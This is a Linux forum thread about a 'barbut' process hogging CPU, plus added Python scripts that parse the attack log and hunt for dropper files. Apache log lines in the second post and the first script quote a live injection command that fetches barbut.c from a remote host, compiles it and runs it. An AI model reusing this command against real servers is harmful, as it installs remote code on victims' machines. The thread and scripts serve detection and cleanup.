10-23-2007 #1 | Just Joined! | Join Date: Oct 2007 | Posts: 1
barbut process
I noticed my Debian sid host was pegged at 100% CPU util. The guilty process was called 'barbut' by user 'guest'. I did a quick search and couldn't find any executables by that name (can't be sure the search is exhaustive). While that process was running I cannot reach the host via network (ssh or anything else). I've turned the machine off for now.
Anyone know what barbut is?
thanks,
charlie
11-21-2007 #2 | Just Joined! | Join Date: Aug 2007 | Posts: 2
barbut.c
I just received this in my error log yesterday:
Code:
[Tue Nov 20 07:57:01 2007] [error] [client 84.234.110.86] Invalid URI in request GET rm -f barbut barbut.c HTTP/1.1
[client 84.234.110.86] script '/WWW/index.php' not found or unable to stat
[Tue Nov 20 07:57:04 2007] [error] [client 84.234.110.86] Directory index forbidden by rule: /WWW/
[Tue Nov 20 07:57:05 2007] [error] [client 84.234.110.86] Invalid URI in request GET cmd.gif?=?&cmd=cd /tmp;killall -9 barbut;rm -f barbut.c;rm -f barbut;wget http://crekom.com/barbut.c;gcc barbut.c -o barbut;./b HTTP/1.1
[Tue Nov 20 07:57:05 2007] [error] [client 84.234.110.86] Invalid URI in request GET arbut ;rm -f barbut barbut.c HTTP/1.1
[Tue Nov 20 07:57:06 2007] [error] [client 84.234.110.86] File does not exist: /WWW/mambo
[client 84.234.110.86] script '/WWW/index2.php' not found or unable to stat
[Tue Nov 20 07:57:16 2007] [error] [client 84.234.110.86] Invalid URI in request GET f?=?&cmd=cd /tmp;killall -9 barbut;rm -f barbut.c;rm -f barbut;wget http://crekom.com/barbut.c;gcc barbut.c -o barbut;./barbut HTTP/1.1
[Tue Nov 20 07:57:17 2007] [error] [client 84.234.110.86] Invalid URI in request GET ;rm -f barbut barbut.c HTTP/1.1
It looks like a takeover of a machine that is already infected with barbut.
Ironically, it also looks like it holds the key to cleaning your machine with a single HTTP GET.
But what you should really do, if you still have this infected machine after 4 weeks (unlikely), is have a look at your /tmp folder. You might find interesting stuff.
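The log excerpt above is worth reading as a detection signature rather than just a curiosity: the request lines only ended up in error.log because Apache could not parse a URI containing raw spaces and semicolons ("Invalid URI in request"), and the `cmd=` parameter carries a complete download, compile, run chain (cd into a world-writable directory, kill the previous copy, wget the source, gcc it, execute it). The following Python is an added example written for this page, not code from the thread or from any of the posters; it parses the log lines as posted (reflowed one per line, embedded here as sample input), splits each injected chain into commands, tags each stage, and pulls out the payload URL. The parameter name `cmd=` comes from the log; the lists of downloaders, compilers and staging directories are my own assumptions about what such droppers typically use, and the "fragment" category exists because the first attempt is visibly split across two log lines (`./b` then `arbut ;rm ...`), so a detector that keys only on `cmd=` under-counts.

```python
import re
from urllib.parse import unquote

# Sample input: the Apache error-log lines from the post above, one per line.
SAMPLE_LOG = """\
[Tue Nov 20 07:57:01 2007] [error] [client 84.234.110.86] Invalid URI in request GET rm -f barbut barbut.c HTTP/1.1
[client 84.234.110.86] script '/WWW/index.php' not found or unable to stat
[Tue Nov 20 07:57:04 2007] [error] [client 84.234.110.86] Directory index forbidden by rule: /WWW/
[Tue Nov 20 07:57:05 2007] [error] [client 84.234.110.86] Invalid URI in request GET cmd.gif?=?&cmd=cd /tmp;killall -9 barbut;rm -f barbut.c;rm -f barbut;wget http://crekom.com/barbut.c;gcc barbut.c -o barbut;./b HTTP/1.1
[Tue Nov 20 07:57:05 2007] [error] [client 84.234.110.86] Invalid URI in request GET arbut ;rm -f barbut barbut.c HTTP/1.1
[Tue Nov 20 07:57:06 2007] [error] [client 84.234.110.86] File does not exist: /WWW/mambo
[client 84.234.110.86] script '/WWW/index2.php' not found or unable to stat
[Tue Nov 20 07:57:16 2007] [error] [client 84.234.110.86] Invalid URI in request GET f?=?&cmd=cd /tmp;killall -9 barbut;rm -f barbut.c;rm -f barbut;wget http://crekom.com/barbut.c;gcc barbut.c -o barbut;./barbut HTTP/1.1
[Tue Nov 20 07:57:17 2007] [error] [client 84.234.110.86] Invalid URI in request GET ;rm -f barbut barbut.c HTTP/1.1
"""

# Apache writes "Invalid URI in request <request-line>" when it cannot parse
# the request line, e.g. because it contains raw spaces and semicolons.
LINE_RE = re.compile(
    r"\[client (?P<ip>[^\]]+)\] Invalid URI in request "
    r"(?P<method>[A-Z]+) (?P<uri>.*?) HTTP/\d\.\d\s*$"
)
CMD_PARAM_RE = re.compile(r"[?&]cmd=(?P<cmd>.*)$")   # parameter name taken from the log
URL_RE = re.compile(r"https?://[^\s;&|'\"]+")

# Assumed indicator lists (not from the thread): typical dropper tooling.
STAGING_DIRS = ("/tmp", "/var/tmp", "/dev/shm")
DOWNLOADERS = {"wget", "curl", "fetch", "lynx", "ftp", "tftp"}
COMPILERS = {"gcc", "cc", "g++", "make"}
KILLERS = {"killall", "pkill", "kill"}


def split_chain(cmd):
    """Split a shell one-liner into its individual commands (; && || |)."""
    return [part.strip() for part in re.split(r";|&&|\|\||\|", cmd) if part.strip()]


def classify(command):
    """Tag one command with the role it plays in a download-compile-run dropper."""
    tokens = command.split()
    tags = set()
    if not tokens:
        return tags
    if tokens[0].startswith("./"):
        return {"execute"}           # run a file from the current (staging) dir
    prog = tokens[0].rsplit("/", 1)[-1]
    if prog in DOWNLOADERS:
        tags.add("download")
    if prog in COMPILERS:
        tags.add("compile")
    if prog in KILLERS:
        tags.add("process_kill")     # replacing an earlier copy of itself
    if prog == "rm":
        tags.add("cleanup")
    if prog == "cd" and len(tokens) > 1 and tokens[1] in STAGING_DIRS:
        tags.add("staging_dir")
    return tags


def parse_injection_attempts(log_text):
    """Return one event per 'Invalid URI' line that carries shell commands.

    kind == "injection": a cmd= parameter with a full command chain.
    kind == "fragment":  no cmd=, but the URI still parses as shell (the log
                         above shows the first attempt split across two lines).
    """
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        uri = unquote(m.group("uri"))
        pm = CMD_PARAM_RE.search(uri)
        shell = pm.group("cmd") if pm else uri
        commands = split_chain(shell)
        tags = set()
        for c in commands:
            tags |= classify(c)
        if not tags:
            continue                 # an Invalid URI that is not shell-like
        events.append({
            "ip": m.group("ip"),
            "kind": "injection" if pm else "fragment",
            "commands": commands,
            "urls": URL_RE.findall(shell),
            "tags": tags,
            # all three stages present: this is a dropper, not mere probing
            "dropper_chain": {"download", "compile", "execute"} <= tags,
        })
    return events


def payload_urls(events):
    """Distinct URLs the attacker pulled code from (what to block, and what to fetch for analysis)."""
    return sorted({u for e in events for u in e["urls"]})


if __name__ == "__main__":
    evs = parse_injection_attempts(SAMPLE_LOG)
    for e in evs:
        print(e["ip"], e["kind"], sorted(e["tags"]), "DROPPER" if e["dropper_chain"] else "")
    print("payload URLs:", payload_urls(evs))
```

Run against the excerpt, this yields two "injection" events (both full droppers, both fetching http://crekom.com/barbut.c) and three "fragment" events from the same client; the payload URL list is the thing to hand to whoever runs the egress filter, and the `cd /tmp` stage is why the advice in this thread to look in /tmp is the right one.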
03-25-2008 #3 | Just Joined! | Join Date: Mar 2008 | Posts: 1
Hi there... I've been getting infected with this since the middle of this month. It's a nasty bugger. Turns out that I had an unpatched version of Apache running that allowed an attacker to upload and compile a program called barbut.c. I did a "files | grep barbut" and found the files. There were two in the /root directory of my Debian box. I've turned off my Apache server and anything else that could be talking on the Internet adapter to the world. I've renamed these files. If you are interested in the source code of this barbut.c file, contact me offline. But for now, I am raring to see if this addressed the problem.
03-25-2008 #4
I would say it sounds like a rootkit/trojan
I found this barbut process using 100% cpu and connecting - Virus & Spyware
If it were me, I would wipe the box. If there is anything you need off it, I would take it offline (no network access) and copy the files to a USB drive, then wipe the machine. Install an updated OS and keep it up to date, and maybe even sign up for the Debian security mailing list so you know when there is an update that affects you.
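Before wiping, it is worth a few minutes to record what was actually on the box, because the posters above found the artefacts in different places (/tmp in one case, /root in another) and the first poster was not sure his search was exhaustive. The script below is an added example written for this page, not a command any of the posters ran; it walks a set of directories looking for the three things the log chain in this thread leaves behind (a file with the known name, a `.c` source sitting next to a same-named compiled binary, and ELF executables in general), and on a live Linux host it also lists running processes whose executable lives in a staging directory, has been deleted from disk, or carries the known name. The staging-directory list is my assumption; "barbut" is the only name the thread gives. The directory tree it is demonstrated on is constructed in the script, not a real infection.

```python
import os
import tempfile

# Assumptions (not from the thread): the usual world-writable staging
# directories a web-server user can drop into; "barbut" is the only name
# the thread gives, so it is the only known-bad name pre-loaded.
ELF_MAGIC = b"\x7fELF"
STAGING_DIRS = ("/tmp", "/var/tmp", "/dev/shm")
KNOWN_BAD = {"barbut"}


def is_elf(path):
    """True if the file starts with the ELF magic, i.e. it is a compiled binary."""
    try:
        with open(path, "rb") as fh:
            return fh.read(4) == ELF_MAGIC
    except OSError:
        return False


def hunt_files(roots, known_bad=KNOWN_BAD):
    """Walk the given roots and report dropper-style artefacts.

    Signals, in decreasing confidence:
      known_name          file named after a known-bad tool (barbut, barbut.c)
      source_with_binary  a .c file next to a binary of the same name
                          (the 'wget x.c; gcc x.c -o x' pattern from the log)
      elf_binary          any ELF executable under the root, with its owner uid
    os.walk does not follow symlinks, and linked files are skipped, so a
    planted link cannot redirect the search.
    """
    findings = []
    for root in roots:
        for dirpath, _dirnames, filenames in os.walk(root):
            present = set(filenames)
            for name in filenames:
                path = os.path.join(dirpath, name)
                if os.path.islink(path) or not os.path.isfile(path):
                    continue
                stem = name[:-2] if name.endswith(".c") else name
                if stem in known_bad:
                    findings.append({"kind": "known_name", "path": path})
                if name.endswith(".c") and stem in present:
                    findings.append({"kind": "source_with_binary", "path": path})
                if is_elf(path):
                    findings.append({"kind": "elf_binary", "path": path,
                                     "uid": os.stat(path).st_uid})
    return findings


def suspicious_processes(proc="/proc", staging=STAGING_DIRS, known_bad=KNOWN_BAD):
    """Running processes whose executable is in a staging dir, has been deleted
    from disk, or carries a known-bad name. Linux only; returns [] where /proc
    is absent so the file hunt above still runs elsewhere."""
    hits = []
    if not os.path.isdir(proc):
        return hits
    for pid in os.listdir(proc):
        if not pid.isdigit():
            continue
        try:
            exe = os.readlink(os.path.join(proc, pid, "exe"))
        except OSError:
            continue  # kernel thread, or we lack privilege for this pid
        base = os.path.basename(exe).replace(" (deleted)", "")
        if exe.startswith(staging) or exe.endswith(" (deleted)") or base in known_bad:
            hits.append({"pid": int(pid), "exe": exe})
    return hits


def build_fixture():
    """Constructed sample tree (not a real infection): a /tmp-style directory
    holding the dropper's source next to a fake ELF, plus an innocent .c file."""
    root = tempfile.mkdtemp(prefix="hunt-")
    tmp = os.path.join(root, "tmp")
    home = os.path.join(root, "home", "guest")
    os.makedirs(tmp)
    os.makedirs(home)
    with open(os.path.join(tmp, "barbut.c"), "w") as fh:
        fh.write("int main(void) { for (;;) ; }\n")
    with open(os.path.join(tmp, "barbut"), "wb") as fh:
        fh.write(ELF_MAGIC + b"\x02\x01\x01" + bytes(9))  # ELF64 header stub only
    with open(os.path.join(tmp, "notes.txt"), "w") as fh:
        fh.write("nothing to see\n")
    with open(os.path.join(home, "hello.c"), "w") as fh:
        fh.write("int main(void) { return 0; }\n")
    return root


def run_demo():
    """Hunt the fixture and return sorted (kind, path-relative-to-root) pairs."""
    root = build_fixture()
    return sorted((f["kind"], os.path.relpath(f["path"], root))
                  for f in hunt_files([root]))


if __name__ == "__main__":
    for kind, rel in run_demo():
        print(f"{kind:20s} {rel}")
    for p in suspicious_processes():
        print("running:", p["pid"], p["exe"])
```

On a real host you would call `hunt_files(["/tmp", "/var/tmp", "/dev/shm", "/root", "/home"])` as root and copy the findings (and the source file, if present) off the machine over USB before reinstalling, exactly as the post above suggests; the ELF owner uid is what ties the binary back to the 'guest' account the first poster saw it running as.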